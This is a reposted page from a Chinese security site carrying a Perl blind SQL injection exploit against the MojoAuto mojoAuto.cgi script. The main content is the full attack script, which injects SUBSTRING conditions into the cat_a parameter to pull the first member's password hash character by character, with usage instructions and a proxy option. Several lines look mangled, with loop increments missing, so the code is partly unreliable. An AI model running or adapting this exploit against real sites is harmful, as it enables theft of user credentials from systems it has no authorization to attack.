• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit ,其中包含cgi,cgi美国签证网站,cgi是什么,cgi一键还原软件,cgi qqzone static等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoAuto Blind SQL Injection Exploit #\n";
print " # (mojoAuto.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat_a value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_a = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_a = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

</div>

您可能想查找下面的文章:

  • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

相关文章

  • IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
  • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
  • CJ Ultra Plus
  • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
  • DreamNews Manager (id) Remote SQL Injection Vulnerability
  • jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
  • NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
  • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
  • Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
    • Mole Group Last Minute Script
    • Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
    • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
    • Sun xVM VirtualBox
    • IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
    • Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
    • PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
    • trixbox (langChoice) Local File Inclusion Exploit (connect-back)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有